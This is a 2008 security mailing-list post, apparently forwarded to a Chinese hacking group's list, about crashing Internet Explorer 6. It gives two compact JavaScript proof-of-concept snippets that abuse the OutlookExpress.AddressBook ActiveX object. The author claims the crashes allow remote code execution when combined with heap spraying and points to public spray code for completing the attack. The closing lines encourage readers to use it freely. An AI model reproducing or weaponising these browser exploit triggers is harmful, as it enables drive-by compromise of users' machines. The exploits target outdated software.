[Ph4nt0m] [zz]More MSIE 6 Mayhem.

Mon, 14 Jul 2008 19:38:29 -0700 

 

It's been a while, and I got a bit rusty on the 'ol browser hacks here and
there, mainly because lack of time. That doesn't mean I didn't research some
browser issues behind the screen. One of them is the XBM image processing in
Firefox, and found that I cannot exploit it[1]. Which is good for Firefox
users! Opera tends denial of service behavior on the XBM #define w/h header,
which might be worthy to investigate some day. Nevertheless, I reverted a
system to run solely Internet Explorer 6 to test some ideas a moment ago.
Therefore, I am not sure if these exploits run on MSIE 7 or later. In any
case, they crash MSIE 6 in such a way that remote code execution becomes
possible by controlling the heap with Javascript aka heapspraying. Since
there are a lot of heapspraying code blocks available on many hacking
repositories I will not go into that, most of them are generic and can be
re-used with a few tweaks, think Milw0rm, or HDM's website.

OK, we are only crashing Internet explorer 6 with the dreaded Active-X
objects from Microsoft just to toy with the idea. There have been many
variations regarding the exploitation of Active-X, and this is simply
another way of abusing them with the most minimal code. I simply wanted to
obtain a method of crashing Internet Explorer with little means, and this is
what the below examples do. And remember not all crashes are exploitable,
but these generally are if you know what you are doing.

Anyway, have fun as long as it lasts! 

Some compact examples, probably more variations possible:

<script>






for(i=0;i<33;i++){






   try{ 






   foo = new
ActiveXObject("OutlookExpress.AddressBook").concat('3'+'3'+'3'); 






   }catch(e){}






}






</script>

 

<script>






for(i=0;i<33;i++){






   try{ 






   foo = new ActiveXObject("OutlookExpress.AddressBook").join(1,1,1); 






   }catch(e){}






}






</script>



And do whatever thou wishest!

[1]
http://mxr.mozilla.org/firefox/source/modules/libpr0n/decoders/xbm/nsXBMDeco
der.cpp#254

 

 

[Ph4nt0m] <http://www.ph4nt0m.org/>  

[Ph4nt0m Security Team]

                   <http://blog.ph4nt0m.org/> [EMAIL PROTECTED]

          Email:  [EMAIL PROTECTED]

          PingMe:
<http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=hanqin_wu
hq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724> 

          === V3ry G00d, V3ry Str0ng ===

          === Ultim4te H4cking ===

          === XPLOITZ ! ===

          === #_# ===

#If you brave,there is nothing you cannot achieve.#

 

 


--~--~---------~--~----~------------~-------~--~----~
 要向邮件组发送邮件,请发到 [email protected]
 要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---

<<inline: image001.gif>>

回复